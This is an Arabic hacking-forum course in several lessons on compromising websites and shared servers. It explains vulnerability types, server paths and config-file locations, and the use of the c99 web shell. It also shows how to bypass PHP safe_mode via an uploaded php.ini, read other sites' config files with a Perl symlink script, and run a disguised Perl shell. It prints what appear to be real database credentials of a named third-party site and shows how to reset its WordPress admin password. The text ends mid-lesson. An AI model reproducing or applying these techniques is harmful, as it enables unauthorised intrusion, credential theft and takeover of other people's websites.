دورة كاملة فى اختراق المواقع

اختراق المواقع , دورة اختراق المواقع , شرح اختراق المواقع , اقوى دورة اختراق المواقع , اختراق المنتديات

بسم الله الرحمن الرحيم

السلام عليكم ورحمة الله وبركاته

اخواني الأعزاء اعضاء منتدي همسات الكرام..!

اقدم لكم اليوم الدرس الثاني من دورة اختراق المواقع
[الدرس الثاني] كيف يعمل الموقع؟! ، وماذا احتاج لعمل موقع؟!

ودرسنا اليوم سيتكلم حول المواقع وكيف يعمل الموقع وماذا احتاج لعمل موقع!

في الدرس الأول شرحنا بعض المصطلحات والأساسيات المهمه مثل السيرفر والداتا سنتر وقواعد البيانات الخ... ، على الرابط التالي
http://www.aljyyosh.com/vb/showthread.php?t=17613
اللي ما شاهد الدرس السابق يعيده ويحفظه لانه الدرس هذا مبني عليه.!

الموقع ليعمل يحتاج الى Domain او ما يسمى بالنطاق (نطاق - دومين)
ويحتاج إلى استضافة.!

الموقع من اجل ان يعمل ويستطيع الدخول عليه الجميع وكل شخص من جهازه! يجب
ان تكون ملفات الموقع موجوده على سيرفر (اي يجب ان يكون الموقع مستضاف على
سيرفر) ، فإذا لم تملك استضافه لا تستطيع عمل موقع وكذلك الدومين.!

ماذا يعني الدومين او النطاق
كل دومين او نطاق هو عباره عن IP Address ، أي عنوان الأي بي، اي الدومين هو عنوان ، نأخذ مثال.!
تخيّل لو انه لا يوجد لك اسم ، فماذا سوف يُعرفونك الناس! ، بالتأكيد
سيقولون ، الشب المسلم العربي الطويل الأبيض اللي شعره أصلع ولحيته طويله
شوف تعريفك كم طويل! ، فمثلا خلينا نشوف الجيوش
اي بي موقع همسات الحالي هو 93.186.192.164 ، تخيّل كل ما بدك تدخل على موقع همسات بدك تكتب هذا الرقم!!.!
مو حلو وصعب وغيّر مريح! ، فقد تم ايجاد شيء اسمه Domain Name اي النطاق بدل أي بي الموقع ، يتم ربط كل موقع بالأي بي الخاص فيه
aljyyosh.com = اسم النطاق (الدومين) ، عند كتابة aljyyosh.com سيفتح لك موقع جيوش الهكرز ، بمعنى ان hmsaat.own0.com هو الدومين.!
امثله على الدومينات
hmsaat.own0.com
elsahm.own0.org
elsahm.own0.net
google.com
elsahm.own0.info
الخ...


الإستضافه : الإستضافة هي ان يكون ملفات الموقع الخاصه بك موجود على سيرفر ،
وقلنا هذا شرط اساسي ليعمل الموقع فالسيرفر هو جهاز متصل بالإنترنت طوال
الوقت.! موجود عليه ملفات موقعك.!
تستطيع وضع اكثر من موقع على السيرفر الواحد اي انك تستطيع وضع عدة مواقع
على سيرفر واحد وتستطيع وضع موقع واحد على السيرفر حسب ارادتك .! ، ومن هنا
ظهر مسطلح اختراق جميع مواقع السيرفر فبهذه الدوره بالمرحله الثالثه سنشرح
اختراق جميع مواقع اللي على السيرفر من خلال الحصول على موقع واحد!.!


بالتوفيق للجميع

اختراق المواقع ,
دورة اختراق المواقع , شرح اختراق المواقع , استغلال الثغرات , دورة
استغلال الثغرات , الثغرات وانواعها , انواع الثغرات , دورة اختراق المواقع
, اختراق المواقع , شرح اختراق المواقع , طريقة اختراق المواقع

بسم الله الرحمن الرحيم

السلام عليكم ورحمة الله وبركاته

اخواني الاعزاء اعضاء منتدي همسات الكرام
هذا الدرس مقدم من منتدي همسات و ASDELY.NET بواسطة ASDELY-ScOrPiOn

اقدم لكم الدرس الثالث من دورة اختراق المواقع وهو الثغرات وانواعها

الثغره الأمنية
هو خطأ برمجي يقع به المبرمج او مناطق ضعيفه الذي تؤدي إلى إستغلالها
لصالح المخترق ، حيث بإمكان المخترق ان يضيف اكواده الخاصه الذي تساعده في
إستغلال الثغره

فهناك الكثير من انواع الثغرات مثل

ثغرات sql Injection

وهي تكمن عن طريق إضافة أمر اخر إلى القاعدة بحيث يكون لصالح المخترق ويمكنه سحب معلومات من القاعدة
وهذا هو قسم دورة sql injection
http://www.aljyyosh.com/vb/forumdisplay.php?f=76

ثغرات Remote File Include

وتعني تضمين ملف خارجي إلى الموقع المستهدف , وبالعاده يكون هذا الملف الشيل ، وهذه الثغرات تقريباً انقرضت
سوف يتم وضع رابطها عند انهاء دورتها

ثغرات Command Execution

وهذه الثغره تمكنك من تنفيذ اوامر إلى النظام ، مثل اوامر اللينكس او
الويندوز بحيث يمكنك على سبيل المقال من جلب الشيل (اداة للاختراق)
سوف يتم وضع رابطها عند انهاء دورتها

ثغرات Local File Include

وهي تضمين ملف محلي ، اي تكمن بتضمين ملف من موقع اخر لكن على نفس السيرفر ، وهي مشابهة لثغرات الريموت فايل انكلود
سوف يتم وضع رابطها عند انهاء دورتها

ثغرات الـ xss

هذه الثغره تكون عن طريق لغة الجافا سكربت ، وهي تساعدنا بسحب الكوكيز ، وما يهمنا هنا هو كوكيز المدير
سوف يتم وضع رابطها عند انهاء دورتها

للان بإمكانك البحث في المنتدى على شروحات لهذه الثغرات فستجد الكثير من الدورات من قبلي انا والاعضاء.!


لكي تخترق مواقع يجب ان تكون متقن للثغرات ، لان الثغرات هي اللي تمكنك من الوصول الى الموقع واختراقه او رفع شيل واختراق السيرفر

لإختراق موقع ليس بالضروره ان تكون متقن كل انواع الثغرات ، فربما تخترق
موقع بثغرة sql injection او بثغرة xss او بثغرة Local File Include الخ...
، لكن كلما تكون متقن ثغرات اكثر تكون امكانية إستهدافك للموقع واختراقه
اكبر.!

يوجد المزيد من انواع الثغرات فأنا ذكرت بعض منها فقط.!

سأشرح الثغرات المهمه في الدروس القادمه.! ، بالتوفيق للجميع

بسم الله الرحمن الرحيم

السلام عليكم ورحمة الله وبركاته

اخواني الاعزاء اعضاء منتديات جيوش الهكرز الكرام

درس اليوم هو ، عن المسارات

الشرخ خاص بمنتديات جيوش الهكرز ، من شرح ASDELY-ScOrPiOn

ماذا اقصد بالمسارات؟!
اقصد بالمسارات هو مكان وجود الموقع على السيرفر + مكان وجود كونفيق سكربت
معيّن + اذا رفعت ملف معيّن على موقع المخترق كيف تستعرضه بالمتصفح + معرفة
مسار اليوزرات على السيرفر الخ...


عادتاً ، وليس دائما يكون مسار الموقع على السيرفر هو



كود:
/home/aljyyosh/public_html
aljyyosh = اسم اليوزر


يعني لنفرض ان الموقع هو aljyyosh.com واليوزر هو aljyyosh

احفظ جيدا public_html تساوي الرئيسية للموقع
فأي شيء يأتي بعد الـ public_html يأتي بعد اسم الموقع فورا
مثلا رفعنا ملف اسمه asdely.txt على مسار



كود:
/home/aljyyosh/public_html/asdely.txt
يكون رابطه



كود:
www.aljyyosh.com/asdely.txt
واذا رفعنا ملف اسمه asdely.txt على مسار



كود:
/home/aljyyosh/public_html/downlaods/asdely.txt
يكون رابطه



كود:
www.aljyyosh.com/downloads/asdely.txt
اظن انها وضحت الفكره


طيب هذا الرابط
www.aljyyosh.com/vb
كيف يكون مسار المنتدى على السيرفر؟!!
اكيد رح يكون بهذا الشكل



كود:
/home/aljyyosh/public_html/vb
طيب احتمال واحد يجي ويقولي يا ASDELY كيف بدي اطلع اليوزرات

اكيد رح اقول لك اليوزرات تكون على هذا المسار



كود:
/etc/passwd
طيب لما اليوزرات بهذا المسار كيف اطلعهم ؟!
رح ننفذ امر cat ، وهذا الامر يقوم بقراءة ملف
يعني يصير الامر كذه



كود:
cat /etc/passwd
البعض منكم رح يقول ، شو بتهبل هذا اسديلي ، يقول لنا تنفيذ امر وهو
ما شرح لنا كيف ننفذ امر ، بقول لك انا شارحه بالدرس اللي بعده ، وهذا
الدرس مجرد معلومات ولكن مهمة جدا ، ورح تعرف مدى اهميتها بعد مشاهدة الدرس
الخامس
http://www.aljyyosh.com/vb/showthread.php?t=17614

========================

الحين رح اعطيكم شوية معلومات عن مسار كونفيقات لأشهر السكربتات (شرحت ايش معنى كونفيق في الدرس الأول)
طبعا السكربت = البرنامج الذي يعمل عليه الموقع مثل vBulletin (اي وهو المنتدى)


نبدأ الأن بسكربت ال vBulletin

يكون مسار الكونفيق كالتالي



كود:
/home/aljyyosh/public_html/path/includes/config.php
path = المجلد الموجود فيه سكربت المنتدى
مثل ما في موقعنا الغالي جيوش الهكرز
المجلد الموجود فيه السكربت هو vb
يعني مسار الكونفيق يكون



كود:
/home/aljyyosh/public_html/vb/includes/config.php
والأن مسار كونفيق السكربت المجاني الشهير Wordpress

يكون مسار الكونفيق كالتالي




كود:
/home/aljyyosh/public_html/path/wp-config.php
ومسار كونفيق سكربت joomla
يكون كالتالي



كود:
/home/aljyyosh/public_html/path/configuration.php
وكذالك سكربت الإستضافة WHMCS بنفس مسار الكونفيق


استضافات am4ss
/home/aljyyosh/public_html/path/requires/config.php

infinity
/home/aljyyosh/public_html/path/include/db.php


phpBB
/home/aljyyosh/public_html/path/config.php


ملاحظة:- احياناً يكون السكربت غير موضوع في مجلد
مثلا هنا www.aljyyosh.com يوجد منتدى
فمسار الكونفيق لا يكون هكذا



كود:
/home/aljyyosh/public_html/path/includes/config.php
بل يكون هكذا




كود:
/home/aljyyosh/public_html/includes/config.php
لمذا يكون هكذا؟! طبعا لانه واضع ملفات السكربت في مجلد public_html مباشره ، وليس داخل مجلد في ال public_html

تيحاتي للجميع

شرح شيل c99 شرح الشيل ، ما هو الشيل استخدام الشيل رفع الشيل طريقة اختراق المواقع

بسم الله الرحمن الرحيم


السلام عليكم ورحمة الله وبركاته

اخواني الأعزاء ، اعضاء منتديات جيوش الهكرز الكرام
اليوم شرح بالتفصيل عن الشيل وأوامر وأمثله للشيل ، والشرح رح يكون عن الشيل المسى ب c99


نبدأ الشرح على بركة الله

ما هو الشيل .؟! الشيل هو اداة مبرمجة بلغة ال php لإختراق المواقع والسيرفرات
طبعا يوجد شيل مو بلغة الphp وهو ال Ssh وطبعا هذا يكون في اللينكس
ولكل من يستخدم نظام لينوكس سوف يجد شيل لديه بإسم (الطرفية)

ماذا بإمكاننا ان نفعل اذا قمنا برفع شيل؟!
بكل بساطه اختراق جميع مواقع السيرفر

طبعا رفع الشيل يتم عن طريق ثغرات او عن طريق معرفة كلمة مرور للوحة تحكم منتدى او لوحة تحكم cPanel
وطبعا سوف تجدون شروحات رفع الشيل في دروس الدورة


الان صورة توضيحية للشيل c99




الان رح اشرح لكم خيارات الشيل ، يعني طرق استخدامه وتفاصيله وادواته
فمثلا يوجد في الشيل تنفيذ اوامر على السيرفر + يوجد في الشيل اتصال بقواعد
البيانات + يوجد بالشيل رفع ملفات + يوجد بالشيل اتصال عكسي والكثير
الكثير


نبدأ في شرح تنفيذ الأوامر في الشيل
Enter
ومعناها إدخال ، اي ادخال امر

وهذه صورة لخانة تنفيذ الأوامر



طبعا تكتب الأمر في الخانة ومن ثم تضغط على كلمة Execute
رح يتنفذ الأمر

مثال على تنفيذ الأمر

مثلا نريد ان ننشأ مجلد اسمه aljyyosh.com
نكتب mkdir aljyyosh.com
ومن ثم نضغط على Execute
ثم يجيب لنا مربع ومكتوب فيه الامر
نضغط Execute كمان مره

وهاذه صفحة يوجد فيها اوامر الشيل
http://www.aljyyosh.com/shell.html


طيب الحين نحن انتهينا من خانة تنفيذ الاوامر


الان رح نشرح خانة الرفع ، اكيد خانة الرفع ما بدها شرح لانها واضحه جدا

لكن رح نشرحها من شان ما تقول شبكة جيوش الهكرز قصرت معانا :p

انزل تحت في الشيل على ناحية اليمين
تجد كلمة Upload

وهذه صورة له



مثل منتم شايفين يا اعضاء الجيوش

نضغط على Browse لإستعراض ملف ونختار ملف اللي بدنا اياه من جهازنا ورح نرفعه


ومن ثم نضغط كلمة Upload لأجل رفع الملف
نقدر عن طريق الرفع اما نرفع اندكس الاختراق ويتم اختراق الموقع او رفع
ادوات اخرى تساعدنا في اختراق السيرفر ، او ترفع اي شيء بدك اياه على
السيرفر ، لعبه او صوره مثلاً


هيك بنكون كمان خلصنا من رفع الملفات



الان نشرح الصلاحيات والتصاريح
لانه قبل ان ننتقل لشرح التنقل في الشيل يجب شرح الصلاحيات والتصاريح

الصلاحيات الكثير منكم يا اعضاء جيوش الهكرز يعرفها ، طبعا اذا مو الاغلب
لكن رح اشرحها للمبتدأين


يوجد في السيرفرات صلاحيات ال nobody وال user وال root
طبعا صلاحيات النو بدي هي زائر
وصلاحيات اليوزر هي صاحب الموقع
وصلاحيات ال root مالك السيرفر


اذا كانت صلاحياتك على السيرفر هي nobody فبإمكانك التنقل بين المواقع
يعني تقدر تدخل اي موقع على السيرفر وتعرض ملفاته لكن صلاحيتك في الموقع
اللي مرفوع لك عليه شيل صلاحية عادية وما تقدر ترفع ملفات او تعدل ملفات او
تحذف ملفات الخ... على عكس صلاحية ال user
اما اذا كانت صلاحيتك user فأنت لك السيطره الكاملة على الموقع اللي مرفوع
لك شيل عليه لكن لا تستطيع التنقل للمواقع الثانية على السيرفر عكس ال
nobody
طبعا في الدروس القادمه سوف نشرح كيف تتنقل من موقع لموقع وتقرأ الملفات
المهمة اللي رح تساعدنا باختراق الموقع مثل ال Config تم شرحها في الدرس
الاول ،
واذا كان صلاحيتك على السيرفر هي root فانت صاحب السيرفر ولك الصلاحيات انك تعمل كل شيء وتقلب السيرفر فوقاني تحاتني :p


طبعا لمعرفة صلاحياتك على السيرفر نفذ امر
id عن طريق مربع تنفيذ الاوامر اللي شرحته بالأعلى
انا نفذته جاب لي
uid=505(clesdayi) gid=502(clesdayi) groups=502(clesdayi)
هاذا يعني صلاحياتي يوزر
وهاذا هو اسم اليوزر clesdayi



خلصنا من القسم الأول وهي الصلاحيات والان نبدأ في التصاريح

التصاريح شيء مهم جدا في الاختراق
فمثلا يوجد تصاريح 777 وتصاريح 755 وتصاريح 700 وتصاريح 644 خخخخ اذا بدي اعدها بده يطول الشرح على الفاضي
ولإعطاء مجلد او ملف تصريح تنفذ الأمر
chmod 777 namefile
namefile اسم المجلد او الملف
واعطيناه تصريح 777 اللي يحبه كل الهكر
فمثلا بدنا نعطي تصريح لمجلد aljyyosh.com اللي انشأناه في قبل ننفذ هاذا الأمر
chmod 777 aljyyosh.com


طبعا اذا كانت صلاحياتك على السيرفر user
فلا يهمك اذا كان تصريح الملف 777 او 000 لانك لك سيطره كامله على الموقع
اللي مرفوع عليه الشيل


فانت تحسب صاحب الموقع وبإمكانك تعمل اللي تبيه وترفع وتغير تصريح على كيفك


اما اذا كان صلاحياتك على السيرفر nobody
فلا تستطيع ان تعدل ملف او تمسح ملف او تغير فيه شيء الا اذا كان تصريحه
777 او المجلد اللي موجود فيه الملف اللي تبي تعدله يكون تصريحه 777
يعني مثلا انت تبي تعدل تصريح ملف اسمه asdely.php
والملف موجود في مجلد اسمه aljyyosh.com ، اذا صلاحياتك nobody يجب انه يكون تصريح مجلد aljyyosh.com هو 777
يعني اذا ملف تصريحه مو 777 ما تقدر تعمل فيه شيء


وهذه صورة من التصاريح



اذا شفت تصاريح بللون الاخضر فمعناها تقدر تعدل عليه
اما اذا شفت لون التصاريح باللون الأبيض فمعناها فقط تستطيع قرائته لكن ما تستطيع تعديله
اما اذا شفت تصاريح باللون الاحمر ، فمعناها لا ستطيع قرائته ولا تستطيع تعديله

ملاحظة : اذا كانت صلاحياتك user سوف
يكون كل تصاريح الموقع اللي مرفوع عليه الشيل لونهم اخضر إلا اذا صاحب
الموقع معدل على تصاريحهن ، وبما انك انت ايضاً لك سيطره تقدر تغير
تصاريحهن كمان مره.

اما اذا كان صلاحيتك هي nobody فستجد ان الملفات هي باللون الأبيض واحيانا
تجد ملفات باللون الاخضر وهذه الملفات او المجلدات اللي باللون الاخضر تقدر
تعدل عليها فقط لا غيّر



الان انتهينا من شغلة التصاريح والصلاحيات واكيد اعضاء جيوش الهكرز فهموا الشرح


ننتقل الى سالفة التنقل في السيرفر


طبعا اذا كان صلاحياتك nobody تستطيع التنقل بين مواقع السيرفر كما شرحت سابقا
اما اذا كان user فلا تملك اي شيء خارج الموقع اللي انت رافع شيل عليه

والتنقل سهل جدا
وخانة التنقل تجدها تحت في الأسفل عند Go Dir او Go File


وهذه صورة من التنقل



home/aljyyosh/public_html/
aljyyosh = اسم اليوزر
طبعا اذا كانت صلاحيتك nobody تتنقل هيك على راحتك
تضع المسار اللي تبي تتنقل له ومن ثم تضغط على Go

هيك يكون انتهينا من شغلة التنقل يا اعضاء جيوش الهكرز


الان ننتقل ل الإتصال بالقواعد
وهي سهلة جدا جدا

في البداية ماذا يفيدنا الاتصال بقواعد البيانات؟! ، كما ذكرت سابقاً ان في
قاعدة البيانات يتم تخزين معلومات الموقع مثل المواضيع الصور اسماء
الاعضاء اسماء المدراء وايميلاتهم وباسوورداتهم في الموقع الخ..! ، فعندما
نتصل بقاعدة بيانات موقع نقوم بسحب باسووردات المدير والدخول الى لوحة تحكم
الموقع ومن ثم اختراقه.

شوف الصورة
يوجد كلمة sql جنب كلمة sec ، نضغط عليها



بعدها رح تيجي لنا مثل هذه الصورة



هنا تقوم بتعبئة بيانات القاعدة وسوف تقوم بالإتصال بها

Database اسم القاعدة
Username اسم مسخدم القاعدة
Password باسوورد القاعدة
Host خليه مثل ما هو ، لكن في احيان تكون مغيره ، تجيب بيانتها مو مشكلة
طبعا هذه البيانات تخرجها من ال config.php اللي في الموقع اللي تبي تخترقه

ومن ثم تضغط Connect

وهيك انت تتصل بالقاعدة
سنشرح في الدروس القادمه طرق التخطي والحصول على ملف الكونفيق حتى نتصل بالقاعدة

لتحميل الشيل من خلال صفحة برامج هكر الخاصة بالجيوش
على الرابط التالي
http://www.aljyyosh.com/hack.html


اخواني واحبائي اعضاء جيوش الهكرز الكرام
تم الشرح بواسطة اخوكم ASDELY-ScOrPiOn من جيوش الهكرز
الشرح بالتفصيل لأجل الكل يفهم ، وبعتقد هيك يكون غطينا الكثير الكثير عن الشيل
واصبح الكل يعرفه

اللي مش فاهم شيء يسأل في قسم المشاكل والاستفسارات وعيد الشرح حتى يفهم لانه صعب على المبتدأين.!

وبالأخر نرجو منكم الدعاء لنا

وتحياتي لكم ASDELY-ScOrPiOn

بالتوفيق..!

السيف مود تخطي السيف مود طريقة تخطي السيف مود شرح تخطي السيف مود ما هو السيف مود ماذا يعني السيف مود ايقاف السيف مود


بسم الله الرحمن الرحيم

السلام عليكم ورحمة الله وبركاته

اخواني الاعزاء اعضاء منتديات جيوش الهكرز

اقدم لكم اليوم ، تعريف ما هو السيف مود واين نجد السيف مود اذا اون او اوف.!


ما هو السيف مود؟!
السيف مود هو نظام حماية في السيرفرات ، يقوم بتفعيله بعض السيرفرات ، بحيث
تقوم بتقييد البرمجيات على السيرفر مثل ال php ، وهو يقوم بحماية السيرفر
من استخدام دوال واكواد خطره ، اي انه بمثابة نظام حماية للسيرفر


طيب كيف افحص السيف مود اذا شغال او موقف ، يعني اذا on او off ؟!
بسيط جداً ، بإمكانك فحص ذلك عن طريق الشيل ، إما شيل C99 او r57 او اي شيل اخر ، والسييف مود يكون موجود بأعلى الشيل.
تجد في الشيل كلمة مكتوبة
Safe-mode : او Safe-mode او Safe Mode

وبعدها يكون مكتوب اذا السيف مود شغال او غير شغال

وهذه صورة توضح حالة السيف مود

صورة تظهر ان السيف مود شغال


وهذه صورة بعد تخطي السيف مود وإيقافه ، وهنا يظهر وهو OFF




كيف اتخطى السيف مود؟!
لتخطي السيف مود هنالك الكثير من الطرق وسنتعلمها في الدروس القادمة باذن الله.!
الى الان انتهى الدرس الى هنا!


بالتوفيق للجميع

تخطي السيف مود ، شرح تخطي السيف مود ، شرح جعل السيف مود اوف ، شرح تخطي الحماية

بسم الله الرحمن الرحيم

السلام عليكم ورحمة الله وبركاته

اخواني الأعزاء الاعضاء الكرام ، اعضاء جيوش الهكرز

الكثير من الهكرز المبتدأين يحصلون على شيل على احدى السيرفرات لكن وللأسف بسبب السيف مود اون يتركوا السيرفر.
هنالك طرق كثيره لتخطي السيف مود وانا سوف أذكر في هذا الموضوع الطريقة الأولى

الشرح مقدم من منتديات جيوش الهكرز ASDELY-ScOrPiOn

سوف يكون شرحنا اليوم هو تخطي السيف مود عن طريق ملف php.ini

ماذا نعني بملف php.ini؟! :- ببساطة، هو ملف اعدادات لغة PHP على السيرفر،
وهو يحدد كيفية تعامل السيرفر مع ملفات البي اتش بي على كل المواقع، أو على
موقع واحد.
اللعبة تكمن هنا!! ، سوف نقوم برفع ملف php.ini على الموقع الذي نملك عليه
شيل وسوف نعيّن في الملف بأن السيف مود هو off ، وعندها سوف تتغير السيف
مود من اوف الى اون

طبعا عن طريق الملف هذا نستطيع تخطي الكثير من الاشياء او تفعيل الدوال الخ... ،

الطريقة
قم برفع الملف على الموقع مكان وجود الشيل الخاص بك. وسوف تجد ان السيف مود اصبح OFF

ماذا سوف نكتب في ملف php.ini
سوف نكتب التالي
safe_mode = OFF

لكن انا سوف اكتب التالي لكي اقوم بتفعيل الدوال ايضا

safe_mode = OFF
disable_functions = NONE

صورة قبل التخطي


صورة بعد التخطي



حمل ملف ال php.ini من المرفقات


بالتوفيق للجميع

سحب
الكونفيق شرح سحب الكونفيق طريقة سحب الكونفيق تخطي صلاحيات اليوزر قراءة
الكونفيق طريقة قراءة الكونفيق قراءة الملفات شرح قراءة الملفات سحب
الملفات شرح سحب الملفات


بسم الله الرحمن الرحيم

السلام عليكم ورحمة الله وبركاته

اخواني الأعزاء اعضاء منتديات جيوش الهكرز

اليوم رح اشرح لكم شرح على السريع لانه كنت عم بشرحه لكم بالتفصيل مع صورة لكل خطوة لكن علق المتصفح وما قبل يستجيب فضغطي ارتفع :p خخخخ


شرح اليوم هو قراءة اي ملف على السيرفر

وهدفها هو ملف ال
config.php

الكل يعرف ما هو ال
config.php

لهاذا رح اشرحه على السريع

هاذا الملف يكون موجود داخله بيانات الإتصال بالقاعدة

وعند معرفة بيانات القاعدة يمكننا بالإتصال بها وتنفيذ اوامر عليها واختراق الموقع

اولا تحميل الاداة

http://www.aljyyosh.info/aljyyosh/tools/sym.zip

باسوورد فك الضغط
www.aljyyosh.com

شرح الاداة

اولا نقوم برفع الأداة على الموقع اللي معانا شيل عليه

فمثلا الموقع هاذا
www.aljyyosh.com

وبدنا نخترق موقع اخر على السيرفر نفسه

وهذا الموقع مثلا

http://www.forumsade.net

وبدنا نقرا الكونفيق حق الموقع من شان نخترقه

ثانيا:- نقوم بإستخراج اليوزرات لحتى نعرف مين اليوزر الخاص لهاذا الموقع


شوفو الصورة هذه ورح توضح لكم كل شيء



طيب الان وجدنا يوزر هاذا الموقع
http://www.forumsade.net
وهو
forumsad

مسار الكونفيق في هاذا الموقع هو




كود:
/home/forumsad/public_html/includes/config.php


الان رح نستخرج الكونفيق

كما في الصورة هذه



صورة بعد قراءة الكونفيق



الان تم قراءة الكونفيق بنجاح
ومن المحتمل في بعض السيرفرات ما تشتغل هذه الطريقة لكن يوجد طرق اخرى رح تشتغل معك.! ، وهذه الطريقة شغالة على معظم السيرفرات.
وفي حالة كون الطريقة غيّر شغالة او قمت بسحب ملف غير موجود (يعني مساره خطأ) على السيرفر رح يظهر لك خطأ الـ Forbidden

الشرح انتهى

ملاحظة هامة :- بين قراءة كل كونفيق وكونفيق على السيرفر يتوجب حذف كوكيز المتصفح بين كل قراءة وقراءة

تحياتي للجميع

بسم الله الرحمن الرحيم

السلام عليكم ورحمة الله وبركاته

اخواني الاعزاء اعضاء منتديات جيوش الهكرز الكرام

اليوم سوف اشرح لكم طريقة تخطي صلاحية اليوزر بالدالة الـ symlink عن طريق البيرل وقراءة الكونفيق

الكثير من المبتدأين يحاول يقرأ الكونيق بدالة symlink عن طريق الـ php ، كما شرحتها في الدرس السابق
على الرابط التالي
http://www.aljyyosh.com/vb/showthread.php?t=17624


لكن في بعض السيرفرات تجرب عن طريق الدرس السابق فيظهر لك Forbidden

الكثير يترك السيرفر وما يخترقه ، لكن كل شيء له حل

بإمكانك عن طريق البيرل تسحبه بدالة ال symlink


فكل ما عليك فعله هو رفع ملف aljyyosh.pl

ووضع داخله هذا المحتوى




كود:
#!/usr/bin/perl
symlink
("/home/aljyyosh/public_html/includes/config.php","/home/user/public_html/asdely.txt");
/home/aljyyosh/public_html/includes/config.php = مسار الكونفيق المراد سحبها
لا تنسى ان aljyyosh = يوزر الموقع
home/user/public_html/file.txt = مسار وضع الكونفيق المسحوبه
user = يوزر الموقع اللي انت موجود فيه


بعد رفع الملف

انتقل الى خانة تنفيذ الاوامر
ونفذ امر perl aljyyosh.pl

عندها سوف تجد ملف اسمه asdely.txt

استعرضه ورح تجد داخله الكونفيق

طبعا مش تقول لي كيف استعرضه! انا شرحة المسارات في الدروس السابقة


بالتوفيق

بسم الله الرحمن الرحيم

السلام عليكم ورحمة الله وبركاته

اخواني اعضاء منتديات جيوش الهكرز الكرام ، شرح اليوم هو "شرح رفع شيل بيرل"

الشرح مقدم من منتديات جيوش الهكرز ASDELY-ScOrPiOn

ما هو شيل البيرل؟! :- شيل البيرل هو شيل تم برمجته بلغة البيرل Perl وهو شيل يتم فيه تنفيذ الأوامر فقط ،
كما تعلمنا سابقا في شيل c99 وشيل r57 انه شيل رسومي بمعنى انه يكون امامك الملفات وأمامك زر التعديل وز الحذف وزر النقل والخ...
لكن هذا الشيل يتم فيه تنفيذ الأوامر + فعاليته افضل لتخطي الحمايات

ماذا نحتاج لتشغيل شيل بيرل ؟! :- نحتاج بأن نعطي تصريح 755 للشيل

الكثير من السيرفرات ما تسمح لنا بتشغيل البيرل على السيرفر للحماية ، لكن
تم إيجاد طرق تخطي كثيره ، ورح اذكر البعض منها الان ، وسنتناول البقيه
لاحقا

سوف نقوم برفع شيل بيرل بإمتداد txt بدلا من pl ونجعله يشتغل كأنه ملف بصيغة pl

لقد قمت برفق الهيتأكسيس + شيل بيرل بصيغة txt

حمل من المرفقات او من الرابط التالي
http://www.mirrorcreator.com/files/0....com.zip_links
نقوم بإنشاء مجلد على الموقع
ومن ثم نرفع داخله الشيل + ملف الهيتأكسيس الذي معه
ومن ثم نقوم بإعطاء الشيل تصريح 755
ملاحظة :- تأكد من اعطاء الصلاحية للملف
امر اعطاء صلاحية هو chmod 755 filename.txt
filename اسم الشيل

ملاحظة هامة:- بعد رفع الشيل والدخول إليه سوف يطلب منك باسوورد دخول وهو
aljyyosh

وفي النهاية تحتاج لهذه الموسوعة من الأوامر
http://www.aljyyosh.com/shell.html

بالتوفيق للجميع

• 
  
  cgi-perl -- Aljyyosh.com.zip‏
  (6.6 كيلوبايت, 36 مشاهدات)
  

شرح الإتصال بقواعد البيانات وتعديل البيانات طريقة الاتصال بتعديل البيانات اختراق المواقع اخترق الموقع من قاعدة البيانات

بسم الله الرحمن الرحيم
السلام عليكم ورحمة الله وبركاته

اخواني الاعزاء اعضاء منتديات جيوش الهكرز الكرام

اقدم لكم اليوم شرح الإتصال بقواعد البيانات وتعديل بيانات المدير ثم الدخول الى لوحة تحكم الموقع.!

رح يتم التطبيق على موقع يستخدم برنامج (سكربت) الشهير ووردبريس WordPress ، ذلك لكونه اكثر السكربتات انتشاراً

في هذا الدرس سوف اشرح من بعد سحب الكونفيق ، يعني انا في الدروس السابقة
شرحة بعض الطرق لسحب الكونفيق ، وكذلك سأشرح في الدروس القادمة طرق اخرى
لسحب الكونفيق وسحب بيانات الاتصال بالقاعدة
ارجوا مراجعة الدروس السابقة لان هذا الدرس مبني عليه.!

طيب رح يتم التطبيق على هذا الموقع
http://fullyvetted.com
والموقع يستعمل وردبريس ، راجع درس المسارات. ، ورح تعرف مسار الكونفيق حق الموقع.!
طيب بعد سحب الكونفيق رح تلاقي فيها بيانات الاتصال بالقاعدة
وانا شرحتها من قبل.!
ونحن نحتاج ال اسم القاعدة واسم مستخدم القاعدة وباسوورد والهوست
يعني لما تفتح اي كونفيق انت بدك تبحث عن المذكور بالاعلى ، وانا في كونفيق هذا الموقع وجدت التالي




كود:
define('DB_NAME', 'xbtudlme_wrdp1'); // The name of the database
define('DB_USER', 'xbtudlme_wrdp1'); // Your MySQL username
define('DB_PASSWORD', 'ZHO4LJpv{027'); // ...and password
define('DB_HOST', 'localhost'); // 99% chance you won't need to change this value
شوف مكتوب db_name وهذه خانة اسم القاعدة ومكتوب db_user وهذه خانة
اسم مستخدم القاعدة ويوجد db_password وهذه خانة الباسوورد حق القاعدة ، مع
العلم انه اسمائهم ليس اجباري يكونو بهذا الشكل.!

طيب الحين عرفني انه اسم القاعدة هو xbtudlme_wrdp1 و اسم مستخدم القاعدة
هو xbtudlme_wrdp1 وكلمة السر للقاعدة هو ZHO4LJpv{027 والمستضيف هو
localhost

طيب الحين نروح للشيل حقنا ونضغط على كلمة sql كما في الصورة التالية


وبعدها رح يظهر لك كما في الصورة التالية


قم بتعبئة البيانات كما واضح بالصورة ثم اضغط على Connect ليتم الاتصال بالقاعدة
بعدها سوف يظهر لك قاعدة البيانات والجداول الموجودة داخل القاعدة كما في الصورة التالية


اختر الجدول الذي تريد الدخول عليه من بيّن الجداول ، وبما اننا نريد تغير
بيانات المدير للدخول الى لوحة التحكم حق الموقع ومن ثم اختراقه ، رح نختار
جدول اللي يكون فيه الاعضاء او المدراء الخ..!
بمعنى احنا رح نبحث عن جدول بكون اسمه admin او user او login او admins
الخ...! ، يعني اي جدول تشك فيه انه جدول فيه بيانات تسجيل الدخول ، ادخل
عليه من اجل التعديل
وفي الوردبريس الشهير يكون الجدول هو wp_users ، نضغط عليه من اجل الدخول عليه
يظهر لك الاعضاء الموجودين في الموقع كما في الصورة التالية



نضغط على التعديل من اجل تعديل العضو ، ورح نعدل العضو الاول ، لانه بالعاده بكون هو المدير بالعاده وليس غالباً.!
بعض الضغط على التعديل كما في الصورة في الاعلى ، يظهر لك كما في الصورة التالية




نحن بدنا نعدل كلمة المرور ، طبعا تقدر تعدل اي شيء ، تقدر مثلاً تعدل
الايميل ثم تذهب للموقع وتعمل استرجاع كلمة المرور ، وكذلك تقدر تعدل كلمة
المرور فوراً
مثل ما ملاحظ كلمة مرور المدير هي
e72cf84b5f3bfa195da2ec0b5aace442
